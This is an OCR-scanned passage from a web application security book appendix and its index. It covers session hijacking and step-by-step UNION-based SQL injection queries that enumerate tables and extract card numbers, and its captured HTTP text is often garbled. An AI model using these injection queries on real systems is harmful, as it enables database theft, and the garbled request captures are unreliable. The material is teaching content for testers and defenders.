be a big help to the hacker, since most cookies contain session identifiers that can be used to impersonate another user. Session Hijacking HTTP is a stateless protocol, and Web applications have no automatic way of knowing what has happened from one page to the next. This functionality must be built into the application by the developer and is typically done through the use of a session identifier. A session ID is essentially a serial number that identifies an individual to the site; it is given by the system at a user's an initial visit and is offered up to the server by the browser on each subsequent request. The system looks up aU pertinent information related to that session ID, then makes appro- priate decisions based on it, such as to allow access to a certain page or to display certain items in the online shopping cart. Session IDs must be protected because they are essentially a form of identifi- cation. Just as someone who steals an employee badge could gain unauthorized access to a building, someone who steals a session ID can gain unauthorized access to a system. For this reason, we follow some basic rules on handUng ses- sion identifiers: ■ They must be uniquely generated so that no two users are ever assigned the same ID. ■ They must be random enough that that nobody can predict a future ID or determine someone else's ID. ■ They must be long enough to prevent the brute-force guessing of an ID in use. Session IDs are typically transmitted by cookies, though they're also com- monly seen in post data (through hidden form fields) and queries. It really doesn't matter how or where they're stored, since they're all equally exposed in the packet. Usually a site wiU just use the session ID created by the server, but every once in a while developers create their own; these are most subject to www. syngress.com An Introduction to Web Application Security • Appendix B 469 abuse. Several large commercial Web sites have made headlines for failing to create unique and random session IDs. In some extreme cases, they actually just incremented the number up for each user, so that guessing someone else's ID was as simple as adding 1 to your own. When session IDs aren't protected, they're subject to theft and reuse. Figure B.32 shows the result of logging into a popular free portal application. You can see that the server sets a new cookie reflecting the authenticated state. Figure B.32 The Cookie Changes to Reflect the Authenticated State POST /forum/login_user.asp?FID=0 HTTP/1.0 Host: localhost User-Agent: Mozilla/5.0 (Windows: U: Windows NT 5.0: en-US: rv:1.7) (3ecko/20040614 FirefoK/O.S StumbleUpoti/1.SS5 Accept: teKt/Kml,application/Kml,applica^ion/Khtml■^Kml,teKt/html:q=0.^,teKt/plain:q=0.8Jmage/png,^/^:q=0.5 Accept-Language: en-us,en:q=0.5 Accept-Encoding: gzip.deflate Accept-Charset: ISO-BBSS-I ,utf-e:q=0.7,":q=0.7 Keep-Alive: 300 Referer: http://localhost/forum/login_user.asp Content-Type: application/x-www-form-urlencoded Content-Length: 1 1 S Connection: Close Cookie:S00P=LTVST=3S304K2E51637S1667:ASPSESSI0NIDASDSAASB=HLKJPIICENBMGFKJEMLHFNPJ name=Ann-t-Nomenus^password=anni1^utoLogin=true^NS=true^securitiJCode=218318^sessionlD=680500324^CFM=^Submit=Forum-t-Login HTTP/1.1 302 Object moved Server: Microsoft-IIS/5.0 Date Sat, 13 Nov 2004 17:24:56 GMT Server: CoffeeMachine Embeded HTTPd >i-Powered-By: Hobbits pragma: no-cache cache-control: private Location: login_user_test.asp?CFM= Connection: Keep-Alive Content-Length: 1 21 Content-Type: tent/html Enpires: Thu, 1 1 Nov 2004 1 7:24:5B GMT Cache-control: No-Store Sel- S00P=NS=01UID=Ann-i-NomenusB7ZFAAZ5EElLTVST=3B304S2E51B37316B7:path=/:eKpires=Sun,13-Nov-2005 17:24:56 GMT head><title>Objectmoved < bodv>< hi > Object Moveddb_backupoperator
    db_datareader
    db_datawriter
    db_ddladmin
    db_denYdatareader
    db_denYdatawriter
    db_owner
    db_securitYadmin
    dbo
    guest
    public
    The work goes very quickly when the page returns all records in the set. Many times the page wiU only return one record, in which case you'll need to manually iterate through the rows to get them aU. This can be easily accom- plished using Boolean operators. Look at this example, where we retrieve all the user tables irom the database. The Sysobjects table stores lists of all objects in the database, and we'U ask for all tables where the user type is U. This means it's a user table, or created by the DBA (presumably for the application), and not a system table automatically cre- ated by the server. The query: storyid=0 union select name from SYSobjects where xtype= ' U ' returns: card_auths WWW. syngress.com 476 Appendix B • An Introduction to Web Application Security The next step is to get another single record, but a different record. We'll simply teU the database that we want the next higher one in the list. The query: Storyid=0 union select name from sysobjects where xtype='U' and name> ' card_auths ' returns: customer_names The query: Storyid=0 union select name from sysobjects where xtype='U' and name> ' customer_names ' returns: News_ar tides Continuing with this technique, we arrive at the following table names: ■ Card_auths ■ Customer_names ■ News_artides ■ Web_users Getting the column names for a particular table is just as easy. We query the Syscolumns table for the column name. Here, however, we need to specify the particular ID number that relates that table back to sysobjects. We could query for each ID number manually and write it down, or we could simply inject a slightly more complex query: Storyid=0 union select name from syscolumns where id= (select id from sysobjects where name= ' card_auths ' ) This politely returns our first column in the card_auths table: card_anth_no. Next we iterate through, using the same technique as before. storyid=0 union select name from syscolumns where id= (select id from sysobjects where name= ' card_auths ' ) and name> ' card_auth_no ' Actually grabbing data from the column follows the same methodology: get a row and use it to fetch the next, iterating through the records until you've satis- factorily scared your client: storyid=0 union select card_no from card_auths WWW. syngress.com An Introduction to Web Application Security • Appendix B 477 returns: 1234666633337890 storyid=0 union select card_no from card_auths where card_no >1234666633337890 returns: 1234678911114567 There are more techniques available for SQL injection, but they go beyond the scope of this book. New techniques include: ■ Evading single quote filters This is when the programmer knows to remove or replace single quotes. It was formerly thought that this step would remove the possibility of SQL injection against strings, although typing input would prevent it against integer values. There is a technique using a SQL function that will still allow the insertion of string values into the database. ■ Blind SQL injection This is an advanced technique for performing injections against pages that have completely handled and suppressed all error messages. With no error messages available, the hacker is essentially "groping around in the dark." With the right technique, however, the attacker can actually go about it in a methodological manner. It's defi- nitely a time-consuming effort, but it works when it's done correctly. ■ At least two completely automated tools for performing SQL injection One is commercial and the other is freeware/loosely licensed. www. syngress.com Appendix B • An Introduction to Web Application Security Summary The full spectrum of Web application vulnerabilities is very broad indeed and is reaUy just recently getting the attention it deserves. Although the security issues of operating systems and other commercial software are weU known, just as many (if not more) issues are prevalent through Web appHcations in use on the Internet and internally to organizations. Without properly secured Web applications, the security of the Web server or network is irrelevant to the Web site security as the application itself becomes an extension of the perimeter. The material covered in this appendix represents the basics. Any penetration tester, appHcation developer, or security engineer is encouraged to further his or her education and skiUs in Web appHcation security through the various papers, sites, and products available to them. References white papers: ■ Cross-site scripting: ■ Cross-Site Scripting, by Kevin Spett, www.spidynamics.com/whitepa- pers/SPIcross-sitescripting.pdf ■ The Cross-Site-Scripting FAQ on CGI Security, viww.cgisecurity.com/ articles/ ■ SQL injection — all three of these are excellent papers written by some of the sharpest minds in computer security: ■ Web Application Disassembly with ODBC Error Messages, by David Litchfield, www.nextgenss.coni/ papers/webappdis.doc ■ Advanced SQL Injection in SQL Server Applications, by Chris Anly, http:/ / www.nextgenss.com/ papers/ advanced_sql_injection.pdf ■ Blind SQL Injection, by Kevin Spett, www.spidynamics.com/ support/whitepapers/BHnd_S QLInjection.pdf ■ Web sites: ■ The Open Web Application Security Project (OWASP), www.owasp.org, hosts an annual conference and local chapters on www. syngress.com An Introduction to Web Application Security * Appendix B Web application security. The site offers many excellent papers as weU as some tools. ■ CGI Security, www.cgisecurity.com, offers papers, articles, Hnks, and more by Bob Auger ■ Security Focus, www.securityfocus.com, the CNN of the InfoSec world. ■ E-mail: ■ Web Application Security on Security Focus, webappsec@security- focus.com, moderated, moderate traffic. This is the de facto OWASP Hst and deals only with Web application security. Solutions Fast Track Defining Web Application Security 0 Web application security deals with securing the actual application being served on a Web site, not the Web server, network, or operating system. 0 Web application security deals with your own software. It doesn't mean Trojans, viruses, spam, or Web filtering. These are all application-level issues that are important to life on the Net but have nothing to do with Web appHcation security. 0 Web appHcation security is a necessary complement to your efforts to secure your servers and networks. Without a secure appHcation, the security in these other areas is undermined. The Uniqueness of Web Application Security 0 Network and operating systems security typically deals with "known" vulnerabilities. 0 Known vulnerabilities can benefit from a homogenous environment. 0 Most Web applications are custom developed so their vulnerabiHties are unique to that application; they are not public, not "known." www. syngress.com Appendix B • An Introduction to Web Application Security 0 The lack of security in Web applications can be generally contributed to the lack of security awareness in the Web development industry and lack of appropriate security testing. Web Application Vulnerabilities 0 Web hacking is an easy discipline and generally requires few tools. 0 Traditional perimeter security is generally ineffective against Web application exploits. 0 Web application vulnerabilities can exist in almost any facet of the application, from the logical construction of authentication mechanisms and session management down to individual function calls. Constraints of Search Engine Hacking 0 Search engines crawl only a portion of what's available to a hacker 0 Search engine hacking finds targets of opportunity, but don't rely on it as a security assessment of your appHcation. 0 You would be able to find anything exposed to Google just by crawHng; however, the majority of Web appHcation vulnerabiHties require actively exercising the application. Information and Vulnerabilities in Content 0 Just by crawling or looking for common fdes, you can find a significant amount of information in a Web appHcation. Some of this information could reveal vulnerabiHties, but a great deal more information found via crawHng will assist you in testing the logic of the code. 0 Files such as robots.txt, FTP logs, and Web traffic reports will guide you to undisclosed portions of the site. 0 Comments, error messages, system documentation, and other such forms of content are all sources of significant information for Web application testing. We've seen throughout this book how this data can be retrieved with search engines. 0 Examine the client-side "programming" that many developers lean on. Hidden form fields, JavaScript, and cookies in particular are misused. An Introduction to Web Application Security * Appendix B This is old school, but many developers still don't realize that anything cHent-sided can be abused. Solution Playing with Packets 0 Serious Web appHcation testing requires the abiHty to work at the packet level. 0 Sniffers will expose the raw packet for viewing, but they don't allow modification. 0 Local proxies intercept the traffic from your browser to the Web appUcation and let you see the raw traffic as well as modify raw requests. More sophisticated proxies allow modification of the server response for testing browser behavior as well. Solution Code Vulnerabilities in Web Applications 0 Vulnerabilities related to the code are by far the most serious Web application vulnerabilities. 0 Client-side attacks such as cross-site scripting attack the users of a Web application to gain their access privileges. They usually require some sort of phishing scheme. 0 Session management issues can allow a hacker to impersonate another user. 0 SQL injection is an extremely serious vulnerabiHty that essentially provides a hacker with direct access to your database by "fooHng" the Web appHcation into running a different database query than expected. 0 Web appHcation security is a major threat. The industry hasn't addressed it until recently, but miUions of Web applications exist. 0 The Web appHcation is an extension of your perimeter. If it isn't secure, neither is your perimeter. 0 Web application security has been receiving a great deal of attention lately. Learn as much about it as you can, and start practicing what you learn in your own organization. www. syngress.com Appendix B • An Introduction to Web Application Security Frequently Asked Questions The following Frequently Asked Questions, answered by the authors of this book, are designed to both measure your understanding of the concepts presented in this chapter and to assist you with real-life implementation of these concepts. To have your questions about this chapter answered by the author, browse to www.syngress.com/solutions and click on the "Ask the Author" form. You will also gain access to thousands of other FAQs at ITFAQnet.com. Q: what level of security does Secure Sockets Layer (SSL) provide against Web application attacks? Al Almost none. SSL provides two functions, the first of which is that it authen- ticates a domain name to an entity. That is, it certifies that www.bigbank.com actually belongs to Big Bank. Second, SSL creates a "secure" encrypted tunnel to the server so that all communication back and forth is highly encrypted and not subject to "eavesdropping." When properly implemented, SSL is very effective at that. However, SSL provides absolutely no assurances regarding the messages sent across that tunnel; it merely ensures that they cannot be read by a third paf ty. In the context of Web hacking, it simply means that the attaclwackets are protected from sniffing as they travel to and from the server. Sinc^man^ intrjujon detection systems do not have the ability to read SSL-encrypted packets, this also means that your hacks get tunneled through any monitoring before executing against the server (a nice side benefit). AH the high-end Web a&plication securi^ products available will fiinction just as easily jjj^i^HTJ^^^s Mi TP. If ^irs doesn't, trade it in for something newer. Note that SSL isn't iimUible, paBcularly if an attacker can arrange him- or herself as a man in themjddle (MITM) . One large sector we work with frequently has a terrible habit of using self-issued cer- tificates, but they never push their root certificates down to their browsers. This means that their users are in the habit of "clicking through" SSL error messages; creating a ripe situation for a MITM to issue a fake cert instead. Ql What is the most secure language to develop in? Al We are asked this all the time, and it's a controversial question. We don't believe that any particular language is intrinsically more secure than another, though it is undeniable that certain platforms provide more mechanisms and www. syngress.com An Introduction to Web Application Security * Appendix B capabilities for security than others do. Syngress publishes a great reference: The Programmer's Ultimate Security Desk Reference, by James Foster. Q: what are some of the worst Web hacks you've ever seen or heard of? Al We've gotten databases, source code, and admin access in under 5 minutes before, but this was all low-hanging fruit — no great hacking on our behalf required. The worst hack we can think of in the news is one we read about in a Security Focus article written in September 2003 by Kevin Poulsen. It was a Web application that had lots of complete credit applications in cleartext that were in an unauthenticated portion of the Web site. As though that weren't bad enough, according to the article they were discovered because the filename was in an HTML comment. The official from the company that Poulsen interviewed really responded to it poorly and as a result was quoted in Business 2.0 magazine in a very unflattering manner. More recently, an online banking application in the United Kingdom "upgraded" its authenti- cation mechanism to be more secure, until it was discovered that it allowed access with just a userid — no password necessary. Q: What's the best way to learn more about Web application security? Al Learn more about Web applications. You have to understand how Web appli- cations work to develop any measure of expertise in Web app sec. In fact, the best minds in any realm of IT sec are all strong coders. Also, make sure that you learn the full spectrum of threats. Don't get tunnel vision on something Hke SQL injection just because it's cool — start from the top and drill down into details from there. Ql Will my existing scanner find Web vulnerabilities? Al Probably not. There are very few actual Web assessment scanners out there, and they are extremely speciaHzed tools. If you have one, you'll know. The majority of scanners on the market today are general "network" scanners that are very focused on known vulnerabilities and the basics, such as open ports or risky services. For working entirely manually, a number of tools are avail- able either freely or very inexpensively. The only automated tools worth looking at are the commercial scanners; these are extremely mature products and were all started a long time ago. Appendix B • An Introduction to Web Application Security Q: Are Web application hacks really invisible to IDS and firewalls? A: For the most part, yes. There are certain hacks that are sure to set off a net- work IDS, such as a directory traversal attack. This existed as a daemon issue for so long — and has such as unique signature — that almost all NIDS wiU detect it. That said, however, we've done complete assessments through a variety of network IDS before and rarely get detected. The few times we've been detected, our customer saw a mere fraction of the actual attacks per- formed. Likewise, we've done assessments on Web appHcations actually run- ning on servers with host IDS on them, with equal results: lots of vulnerabilities, no alerts, since they tend to be more process and memory ori- ented. Web hacks execute within existing processes — the Web daemon and the database daemon — so no new processes should be launched unless the Web hacker attempts a fuU root kit. Q: Is Web application security more important than network security? Al That's your caU. We'd caU a buffer overflow on a service exposed to the DMZ pretty serious, but at the same time, if we can get to your database from our wireless PDAs while sitting on a train, that's pretty bad, too. So far there hasn't been a Web application-based worm, but such a thing is undoubtedly coming. Ql WiU securing my database help prevent SQL injection? Al Securing your database will greatly mitigate SQL injection hacks. By parti- tioning access and restricting capabilities via standard hardening techniques (such as removing unnecessary procedures), you wiU greatly reduce (or com- pletely negate) what can be done with SQL injection. Beware, though — don't forget to harden the Web application code as well or you could find other vulnerabiUties sUpping through. Q: Is it true that Web services are more secure than Web applications? A: Absolutely not. Remember that although the presentation protocol has changed (there is now a SOAP envelope,) it's essentially the exact same back- end code that would be used in a Web application, and thus it's susceptible to the exact same mistakes. The best Web application scanners wiU audit Web services in addition to Web applications. ' As reported by Netcraft.coni in the September 2004 Web Server Survey, http://news.netcraft.com/archives/web_server_survey.html. ^ The heaviest used rules are usually placed highest in the rule set to optimize performance. WWW. syngress.com Symbols and Numerals — (minus) operator, 19—20 I (pipe symbol), 20, 374 + (plus) operator, 19 ? (question mark), 25 (quotation mark), 16, 18 # sign (Crosshatch), 325 Oday (zero-day) exploits, 182 10-word linTit, 16-17 80/20 rule, 157-158 Index Access badges, 143 Access database, 475 Account, creating, 369-371, Active Server Page (ASP) dumps, 239 error messages, 238—239 Actual security, 425-427 Address, masking, 167 Address books, 280 Addresses, e-mail, locating, admin \ administrator search| 210-212 Advanced Groups Search link, 8 Advanced Search link, 4 Advertisements, pop-up, 1 Advisories, 186-187, 190 AIM (AOL Instant Messegsgr) buddy Hsts, 283 Alarm, 429 aUintext operator, 43, 49-50, 77. allintitle operator, 43, 48—4' hnk,8 aUinurl operator, 43, 51—52, 78 Alt. group links, 8 AltaVista, operators in, 85-86 Am^ln "wish Hsts," 142 AND operator, 18-19, 374 Anomaly 426-427 Anonymity via caches, 88-95 AOL Instant Messenger (AIM) buddy lists, 283 Apache Web servers default settings, 330 default Web pages, 242-244 documentation, default, 247 error messages, 229-238 error-page titles, 236—237 securing, 360 server tag, disabling, 261—262 versions, 105—108 API. see Application Programming Interface (API) Apple Gooscan, 333 *^ " Appliance, Google, 334 Application Programming Interface (API) unt, creating, 369- C implementation, 397-405 C# implementation, 393—397 filt e r p arameter, 372 liceTKe keys, 128, 348, 369 limitations, 376—377 Perl implementation, 386—390, 406-411 Python implementation, 390-393 sample code, 377—383 search parameters, 371-372 search requests, 375-376 search responses, 376-377 486 Index using, 158-159 Application security, see Web application security (Web app sec) as_... variables, 28—29 ASP. see Active Server Page (ASP) Assessments external blind, 152 physical, 143 preassessment information- gathering techniques, 122 tools, 238 Asterisks (*), 15, 17 Athena tool checking exposure, 361 configuration files, 345-348 description, 343-345 Web site, 359 Attack libraries, 384-386 Attacks, client-side, 459-462 Auditing organizations, government, 420 Authentication, 264, 428, 442 Authentication forms, 328 author operator, 66-69 Authors, searching, 66-69, 164-166 Auto-googling black-hat, 368 C implementation, 397-405 C# implementation, 393—397 Perl implementation, 386—390, 406-411 Python implementation, 390—393 white-hat, 375-377 Automated grinding, 312-315 Automated trolling for e-mail, 128-134 Automatic URL removal, 355-356 Automation libraries, 384-386 Axis StorPoint servers, locating, 172 B Backup files, 111-114, 119 Badges, access, 143 Bars, 145 Base searches, 22 Belkin Cable/DSL routers, locating, 172 Bi-directional link extractor (BiLE) program, 161—164 "Big iron" targets, 159 BiLE (Bi-directional link extractor) program, 161-164 Biz. group Unks, 8 Black-hat auto-googling, 368 BlackHat, 2003, 154, 160 Blind security assessment, 152 Blogs, 140 Boolean operators, 18, 43, 58 Bots. see Crawlers bphonebook operator, 73 Buddy lists, AOL Instant Messenger (AIM), 283 Built-in cameras, 145 Business phone numbers, searching for, 72-73 c C code file extension (.c), 182-183 C implementation of API, 397-405 C# implementation of API, 393-397 Cache anonymity via, 88—95 Index 487 banners, 89 headers, 94-95 preventing, 325-327 viewing via cut and paste, 93-94 cache operator, 62-63 Cached sites, searching, 62-63 Cameras, built-in, 145 Case sensitivity, 14—15 CGI scanning, 197-199, 201, 406-411 Characters hexadecimal codes, 26 special, 26, 43 Chat log files, 280 Cisco products, locating, 172 Client-side attacks, 459-462 Code sample, 377-383 Code strings, common, 184—186 Coffee shops, 144 Colliding operators, 75 Colons ignored, 191 Combining advanced operators, 43, 75-76 Command injection, 301, 308, 442-443, 471-474, 484 Command-line browsers, 156-157 Comments, HTML, 447-448 Common code strings, 184-186 Comp. group links, 8 Company intranets, 124 Concern, 426 Confidentiality, 428 Configuration files description, 291 finding, 292-295 httpd.conf, 231, 261-262, 325 search examples, 295—297 support files, 304 Connections, logging, 88-89 Constraints of search-engine hacking, 443-445 Contact, nonconfi-ontational, 143 Contact list files, 283 Continuity, 429 Conversion to HTML or text, 56—58 Cook, Norman, 326 Cookies, 4, 456, 458, 468-471 count parameter for Gooscan, 337 Crackers, password, 273 Crawlers guarding against, 323 instructions for, 325 META line, 327-328 robots.txt files, 325-326, 360, 445-446 user-agent field, 325 Crawling, 155-156 Crawling, disabling, 119 Credit-card numbers, searching for, 276-278 Criteria for searches, 365-1305 Cross-site framing, 460 Cross-site scripting (XSS), 461-462, 466-468 Crosshatch (# sign), 325 CubeCart, 189 Cut-and-paste viewing of cache, 93-94 CuteNews, 190-193 D Data networks channel, 423 Databases database files, 310-311 488 Index dumps, 309-310 enumerating, 471, 475-477 error messages, 306-308 information leaks, 319 login portals, 302-304 support files, 304-306 daterange operator, 64-65 Dates, Julian, 64 Dates within a range, searching, 64-65 Debugging scripts, 304 Default documentation, 246-248 Default programs, 249-250 Default settings, 330 Default Web pages Apache Web servers, 242-244 Internet Information Server (IIS), 244-245 Netscape servers, 245 use of, 241 define operator, 72 Definitions of terms, 72 DejaNews. see Newsgroups DejaNews (deja.com), 6-7 Delis, 144-145 Demonstration pages, 187-189 Diners, 144-145 Directory listings description, 99-100 disabling, 324-325 files, finding, 102-103 FTP log files, 446-447 "Index of," 100-102 locating, 100-102 missing index files, 324—325 preventing caching, 325-327 robots.txt files, 325-327, 360, 445-446 server tag, 223—225 Disabling directory listings, 324—325 Disclosure of information, 443 dns-mine.pl script, 158-159, 377-383 Document Object Model (DOM), 465-466 Documentation, default, 246-248 DOM QavaScript Document Object Model), 465-466 Domains determination, 154-155 finding, 155-156 name formation, 152 searching, 52-54 Dumps Active Server Page (ASP), 239 databases, 309-310 see also tcpdump command Dumps of databases, 309-310 E E-mail addresses, locating, 137-138, 312-315 folders, personal, 135 lists. Web-based, 141 relationships, 139-140 trolling, automated, 128-134 eBay phishing, 278 employee. ID \ "your username is" searches, 209 Employment postings, 126 Enumerating databases, 471, 475-477 error \ warning searches, 206-207 Error messages Active Server Page (ASP), 238-239 Index 489 Apache Web server, 229-238 applications', 238-241 databases, 306-308 finding, 225-229 Google, 44-45 Internet Information Server (IIS), 225-229 page titles. Apache, 236-237 page titles, IIS, 227-228 Web application security (Web app sec), 448 Escaping from literal expressions, 463-468 Ethereal packet sniffer, 456-457 Ethical hacking methodology, 420 Eudora, 134 Excessive metadata, 319 Expanding (stemming ), 15, 23 Explicit sexual content, 11 Exploit code, locating common code strings, 184-186 pubUc sites, 182—183 Exploits description, 182 Exposure, 426 Exposure, checking, 360-361 Extensions, see File extensions External blind security assessment, 152 -ext:html -ext:htm —ext:shtml -ext:asp —ext:php searches, 212-216 F File extensions C code (.c), 182-183 erroneous, 449-45 1 financial programs, 280 list of, 54-55 scripts, 330 searching, 54-58 Structured Query Language (SQL), 310 top 20,213 top 25, 55-56 walking, 111-114 Web source for, 318 File names finding in directory listings, 102-103 searching for, 267 variations of, 119 File types, see File extensions filetype arguments, ORing, 295 filetype operator, 54-58, 111 filetype search type for Gooscan, 336 filetype. gs file for Gooscan, 337-338 FILExt database, 56 Filling stations, 145 Filter parameter for API, 372 filter variable, 28 Finance programs, personal, 279—280 Financial data, personal, 279-284 Footer text, finding, 191-192 Forgotten password recovery mechanisms, 275 Forms, user authentication, 328 Forum, Search Engine Hacking, 262 Foundstone, 383 FQDN (fuUy qualified domain names), 152 Framing, cross-site, 460 FTP log files, 446-447 FuUy qualified domain names (FQDN), 152 490 Index G Gas stations, 145 gdork.gs file for Gooscan, 337 Geographic regions, 33-34 GHDB (Google Hacking Database), 174-175, 194, 262, 359 GNU Zebra, 21 Google, getting help fi-om, 354-357 Google API. see Application Programming Interface (API) Google appliance, 334 Google Desktop Search, 316, 318 Google Groups, see Newsgroups Google Groups Advanced Search feature, 127 Google Hacking Database (GHDB), 174-175, 194, 262, 359 Google Image search feature, 8-9 Google Local, 143-145 Googlebot, 325 Googleturds, 54 Gooscan tool data files, 335-338 description, 199, 332-333 installation, 333 options, 334-335 use of, 338-342 Government auditing organizations, 420 grep command, 235 Grinding, automated, 312-315 group operator, 69 Groups, see Newsgroups H Hackers, 59, 63-64, 78 Hacking, constraints of, 443-445 Hardware, Web-enabled, 171-172, 178-179,255-258 H.E.A.T. tool, 223 Help-desk references, 124 Help from Google, 354-357 "Helper" programs, 14 Hexadecimal codes, 26 Hidden form fields, 453 Hidden JavaScript, 453 Highlighting, 49, 95 hi (home language) codes, 6, 28, 30-32 host command, 90 "How-to" guides, 124-125 HP Insight Management Agents, locating, 172 Jitaccess files, 324, 329-330 HTML comments, 447-448 HTML or text, conversion to, 56—58 HTTP requests and responses, 453-456 httpd.conf configuration files, 231, 261-262, 325 Human-friendly queries, 23 Human Resources departments, 123 I Ideahamsters, 421 Identified weaknesses, 427 IDS (intrustion detection systems), 484 Index 491 ie (input encoding) codes, 28 Ignored words, 15-16 Ihackstuff, 415 IIS. see Internet Information Server (IIS) I'm Feeling Lucky button, 4 Image search feature, 8—9 image tags, 463, 465-467 inanchor operator, 62, 78 inauthor operator, 3 .INC files, 320 Include files C code, 184 protecting, 320 server-side, 113 Incremental substitution, 110—111 Indemnification, 428 "Index of" directory listings, 100—102 Index Server, 248-249 Indexes, Apache, see Directory listings indexof search type for Gooscan, 336 indexof.gs file for Gooscan, 338 info operator, 65 Information disclosure, 443 Information leaks, 319, 354 Instant messaging, 140—141 Instant Messenger (AIM) buddy lists, 283 Institute for Security and Open Methodologies (ISECOM), 421 insubject operator, 69-70 Integrity, 428-429 Interface language tools, 12—14 newsgroups, 5-8 preferences, 9—12 Web results page, 5-6 Web search page, 2-4 Internet Information Server (IIS) bad file extensions, 449-451 default documentation, 247 default Web pages, 244-245 error messages, customized, 261 error messages, finding, 225-229 error-page titles, 227-228 locking down, 330 securing, 360 Security Checklist, 330 Internet Protocol (IP) addresses, 152-153 intitle operator description, 46-48 examples, 43-44, 101-109 intitle search type for Gooscan, 336 intitle -.index, of searches, 206 intranet \ help, desk sea.rches, 216— 217 Intranets, 124 Intrustion detection systems (IDS), 484 inurl operator, 50-51, 77, 92 inurl search type for Gooscan, 336 inurl. gs file for Gooscan, 338 inurhtemp \ inurhtmp \ inurhbackup \ inurhbak searches, 216 IP (Internet Protocol) addresses, 152-153 ISECOM (Institute for Security and Open Methodologies), 421 ITFAQnet.com, 85 J Java, 371 JavaScript Document Object Model (DOM), 465-466 Job postings, 126 492 Index John the Ripper password cracker, 273 Julian dates, 64 K Keys, see License keys for API L langpair parameter, 96 Language, translation of, 5-6, 12-13 Language rescrict (Ir) codes, 28-31 Language settings for proxy servers, 11 Language tools, 4, 12—14 Language use codes, see Home language (hi) codes Languages for API, 373 Lantronix web-managers, locating, 172 Laptops with built-in cameras, 145 Leaks of information, 319, 354 Libraries, automation, 384-386 Lib whisker Perl library, 110 License keys for API, 128, 327, 348 Limit of 10 words, 16-17 Limitations, security, 425-427 link operator, 59-62, 79, 160 Links from and to targets, 160-161 mapping, 159-164 pages without, 118 removing, 356 to specified URLs, searching, 59-62 Literal expressions, escaping from, 463-468 Local proxies, 457-458 Lockouts, 368 Log files, 296, 298-299 Logging Web connections, 88-89 login I logon searches, 208-209 Login portals, 250-255, 302-304 Login prompts, 191 Long, Johnny, 332 Looking Glass servers, locating, 173 Lord, Steve, 343 Loss controls, 427 Ir (language restrict) codes, 28-31 Lucky button, 4 lynx command-line browser, 156—157 M Macintosh Gooscan, 333 Mail, see E-mail Mapping domain determination, 154—155 link mapping, 159—164 methodology, 152-153 page scraping, 156-158 scripting, 158-159 site crawling, 155-156 Masking query host address, 167 maxResuhs variable, 28 Message identifiers, searching for, 70-71 Messages, error, see Error messages Messaging, instant, 140—141 META tags, 327-328 Metadata, excessive, 319 Microsoft. 5ee Access database; Index Server; Internet Information Server (IIS); .NET framework; Index 493 Outlook; Outlook Web Access; SQL Server; Web Data Administrator software package Microsoft C#, 371 Microsoft Money, 279-280 Minus (-) operator, 19-20 Mixing advanced operators, 43, 75-76 Money, Microsoft, 279-280 msgid operator, 70-71 MSN Messenger contact list files, 283 Multilingual password searches, 275-276 Multiple-query mode for Gooscan, 340 mysql_connect function, 305 N Name formation for domains, 152 Narrowing searches, 14 Native language, 9 Negative queries, 156 Nessus security scanner, 284 Nessus tool, 223 Netcraft, 171 Netscape servers, 245 Network devices. Web-enabled, 171-172, 178-179,255-258 Network printers, 257 Network Query Tool (NQT), 166-171 Network reports, locating, 173-175 Network vulnerability reports, 280 Newsgroups authors, searching, 66-69 Google Groups Advanced Search feature, 127 interface, 5—8 post titles, searching, 46-49, 66-69 posts, removing, 357 tracing, 164-166 USENET, 6-7 Nightclubs, 145 NIKTO security database, 406 Nikto tool, 110, 201,332 Nmap tool, 223 NNTP-Posting-Host, 165 No-cache pragma, 360 NOARCHIVE in META tag, 327 Nomad, Simple, 438 Non-Google Web utilities, 166-171 Non-repudiation, 428 Nonconfrontational contact, 143 NOSNIPPET in META tag, 327-328 NOT operator, 374 Novell Management Portal, 252 NQT (Network Query Tool), 166-171 nslookup command, 90 ntop programs, 173 Number of Results setting, 12 Numbers within a range, searching, 63 numrange operator, 63 o OASIS WAS Vulnerability Types and Vulnerability Ranking Model, 442 oe (output encoding) codes, 28 Office documents, 299-301 494 Index Open Source Security Testing Methodology Manual (OSSTMM) improving, 436 methodology chart, 430 origins, 420-421 other security methodologies, 435 security presence, 422-423, 431-433 standardized methodology, 424—429 Opera Web browser disabling Google crawling, 119 finding pages without links, 118 Operating systems of servers, 108 Operational security, 424-425 Operators advanced, combining, 43, 75-76 in AltaVista, 85-86 Boolean, 18,43,58 colliding, 75 description, 46 examples, 43—44 list of, 42, 75-76, 80-84 mixing, 43, 75-76 OR, 374 other search engines, 85-86 syntax, 43 Web site, 86 in Yahoo, 85 see also Operators, specific Operators, specific - (minus), 19-20 + (plus), 19 allintext, 43, 49-50, 77 allintitle, 43, 48-49 allinurl, 43,51-52,78 AND, 18-19 author, 66-69 bphonebook, 73 cache operator, 62-63 daterange operator, 64—65 define, 72 filetype, 54-58, 111 group, 69 inanchor, 62, 78 imuthor, 3 info, 65 insubject, 69—70 intitle, 43-44, 46-48, 101-109 inurl, 50-51,77,92 link, 59-62, 79 msgid, 70-71 NOT, 374 numrange, 63 OR, 374 phonebook, 72-75 related, 66 rphonebook, 73 site, 52-54, 77-79, 204-205, 332 stocks, 71-72 see also Operators OR operator, 374 Oracle database, 475 OILing filetype arguments, 295 OSSTMM. see Open Source Security Testing Methodology Manual (OSSTMM) Outdated links, removing, 356 Outlook, 134-135 Outlook Web Access portal, 251, 268-269 Index 495 P Packet sniffer, Ethereal, 456-457 Packets, 453-459 Page scraping, 156-158, 414 Page text, searching, 49-50 Page titles Apache error messages, 236-237 IIS error messages, 227-228 searching, 46—49 PalookaviUe, 326 Parameters for searches, 27—28 Parentheses ignored, 20 use of, 375 password | passcode \ "your password is searches, 210 Password crackers, 273 Password file, system, 110 Password prompts, 191 Password-protection mechanisms, 328-330 Passwords authentication, 329 clear text, 274 encrypted or encoded, 273-274 encryption, 288 forgotten password recovery mechanisms, 275 searching for, 270-275 shared, 287-288 Patches, security, 331 Penetration testers, 92, 222, 420 Perl CPAN modules, 162 implementation of API, 386-390, 406-411 scripting, 158-159, 312-315 Personal e-mail folders, 135 Personal finance programs, 279—280 Personal financial data, 279-284 Personal information, 142 Personal Web pages and blogs, 140 Personnel channel, 423 Personnel departments, 123 Phishing to catch scammers, 278-279 cross-site fi-aming, 460 scams, 277-279, 287 Phone numbers removing from Google list, 74 searching for, 72-75 phonebook operator, 72-75 PHP files, 113 Phrack, 164 Phrase searches, 18 Physical assessment, 143 Physical channel, 423 Pipe symbol ( | ),20, 374 Plus (+) operator, 19 Policies, security, 322-323 Polling, public, 1 26 Pop-up advertisements, 12 Portals, login, 250-255, 302-304 Ports, multiple, 178 Portscans, 223 Post titles, searching, 46-49, 